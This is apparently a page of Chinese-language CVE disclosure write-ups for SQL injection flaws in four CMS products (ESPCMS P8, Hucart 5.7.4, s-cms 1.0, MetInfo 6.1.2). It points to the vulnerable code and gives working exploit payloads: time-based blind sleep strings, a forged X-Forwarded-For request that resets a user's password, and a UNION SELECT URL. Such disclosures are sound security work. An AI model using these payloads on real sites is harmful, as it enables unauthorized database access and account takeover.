CVE中文申请站

CVE-2019-5488:ESPCMS企业网站管理系统P8存在SQL注入漏洞

一、漏洞摘要

漏洞名称: ESPCMS企业网站管理系统P8存在SQL注入漏洞
上报日期: 2019-01-04
漏洞发现者: Sins
产品首页: https://www.earclink.com/html/cn/espcms/
软件链接: https://www.earclink.com/html/cn/download_espcms/
版本: P8
CVE编号: CVE-2019-5488


二、漏洞概述

由于SQL语句的拼接不当,导致存在SQL注入,具体请看漏洞代码
/install_pack/espcms_public/espcms_db.php
205-363
1.png
跟踪代码,发现仅在输出处使用了addslashes函数进行转义,具体代码如下:
/install_pack/espcms_web/Member.php
437-439
2.png

三、利用代码

时间盲注,判定漏洞存在后,可以使用sqlmap进行注入。
Exp:

1.(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
2.(select(0)from(select(sleep(4)))v)/*'+(select(0)from(select(sleep(4)))v)+'"+(select(0)from(select(sleep(4)))v)+"*/

以下是sqlmap:

payload:ac=Member&at=verifyAccount&verifyType=0&verify_key=(SELECT (CASE WHEN (9456=9456) THEN 9456 ELSE 9456*(SELECT 9456 FROM INFORMATION_SCHEMA.PLUGINS) END))

3.png

四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/108/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5488
exploit-db:发布中

CVE-2018-19468:Hucart cms v5.7.4 SQL注入漏洞

一、漏洞摘要

漏洞名称: Hucart cms v5.7.4 SQL注入漏洞
上报日期: 2018-11-20
漏洞发现者: zzzzzzzz
产品首页: http://www.hucart.com/
软件链接: http://www.hucart.com/
版本: v5.7.4
CVE编号: CVE-2018-19468


二、漏洞概述

Hucart cms v5.7.4未对HTTP头部数据进行安全过滤,产生SQL注入漏洞。
文件system/class/helper_class.php第4-38行代码如下:
1.png
2.png
方法get_ip未对HTTP_X_FORWARDED_FOR等头内部的数据进行校验,并将其中的值作为IP地址直接返回,代码多处功能均调用此方法获取IP地址插入数据库,故产生多处SQL注入漏洞,其中一处如下:
文件application/user/login.php使用act_login方法处理普通用户登陆请求,如登陆成功,则对数据库进行更新,其具体实现位于81-101行,如下图:
3.png
代码于第83行调用get_ip方法获取IP地址$user_ip并于99行拼接入SQL语句中执行,故攻击者可在HTTP_X_FORWARDED_FOR等头内部插入攻击向量,发动SQL注入攻击。

三、利用代码

exp代码如下:
在HTTP_X_FORWARDED_FOR中插入SQL注入攻击向量即可,例如对于普通用户登陆界面处的注入漏洞,其请求如下:
攻击者即可通过注入漏洞修改任意用户密码,也可发动其他类型的SQL注入攻击。

POST /user/index.php?load=login&act=act_login HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/user/index.php?load=login&act=act
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
Cookie: csrftoken=o2JPu6uSjJAMj0bgh2AB90bgd4igPjzCtfvrhP6jTFKpy87BxZfZIb31OqfJutMz; PHPSESSID=btl6d5bko1cd6voo5nshln498g; ck_num=a600bd172fcabd688500dac58ebda3a0
Connection: close
Upgrade-Insecure-Requests: 1
X-Forwarded-For: attack', use_pwd=md5('attack') Where use_name='test1' #

use_name=test&use_pwd=123456&use_captcha=asdasdd&submit=


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/83/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19468
exploit-db:发布中

CVE-2018-18887:s-cms php ver 1.0新闻建站系统用户投稿处存在sql注入

一、漏洞摘要

漏洞名称: s-cms php ver 1.0新闻建站系统用户投稿处存在sql注入
上报日期: 2018-10-27
漏洞发现者: kr1sten
产品首页: https://www.s-cms.cn/
软件链接: https://shanlingtest.oss-cn-shenzhen.aliyuncs.com/file/6.news.php.zip
版本: php ver 1.0
CVE编号: CVE-2018-18887


二、漏洞概述

开启前台注册后,投稿发文章type参数存在SQL注入。


三、利用方法

漏洞存在位置:member/member_news.php
1.png
在8-11行 定义了一个变量去接受外部传参 变量名“$N_type”在本文件下搜索这个变量名逐个跟踪分析
2.png
这一段代码 是通过传来的参数进行判断文章是否通过审核,不理会 继续跟踪
3.png
87-93行 是将数据判断后显示在页面 继续跟踪
4.png
114行sql语句这里就有问题了,他是将变量拼接进入语句里 可控 我在115行将sql语句输出 看看页面是怎么样的
5.png
这是文章页面
6.png
然后 输入 and 1=1 和 and 1=2 看下页面的变化情况
7.png
可以看到 直接将用户输入的数据直接给拼接到sql语句了 直接去带入数据执行
下图是 and 1=2时的结果,两个图做一下对比 ,很明显的 下面的数据没有显示出来 也就是说明 这个地方是存在sql注入的
8.png
接下来 使用sqlmap 跑一下,此处要注意:必须要抓包进行post注入 不然没有cookie参数 sqlmap是无法进行注入的,看下图:
9.png
成功跑出数据库


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/75/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18887
exploit-db:发布中

CVE-2018-17129:Metinfo-6.1.2版本存在SQL注入漏洞

一、漏洞摘要

漏洞名称: Metinfo-6.1.2版本存在SQL注入漏洞
上报日期: 2018-10-12
漏洞发现者: 踏月留香
产品首页: https://www.metinfo.cn/
软件链接: https://www.metinfo.cn/upload/file/MetInfo6.1.2.zip
版本: 6.1.2
CVE编号: CVE-2018-17129


二、漏洞概述

漏洞存在于MetInfo6.1.2/app/system/feedback/admin/feedback_admin.class.php页面中,由于该页面的class1参数过滤不严,导致存在SQL注入漏洞。
本地搭建网站,首先登录网站后台:http://172.16.141.134/MetInfo6.1.2/admin/,登录成功后,构造payload:
http://172.16.141.134/MetInfo6.1.2/admin/index.php?lang=cn&anyid=29&n=feedback&c=feedback_admin&a=doexport&class1=-1//union//select//concat(0x3a,user(),0x3a)//from/**/information_schema.tables&met_fd_export=-1,访问后网站会导出一个excel表,excel表的名称为数据库用户名:
sqli.png

三、利用代码

exp代码如下:

http://127.0.0.1/MetInfo6.1.2/admin/index.php?lang=cn&anyid=29&n=feedback&c=feedback_admin&a=doexport&class1=-1/**/union/**/select/**/concat(0x3a,user(),0x3a)/**/from/**/information_schema.tables&met_fd_export=-1


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/54/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17129
exploit-db:发布中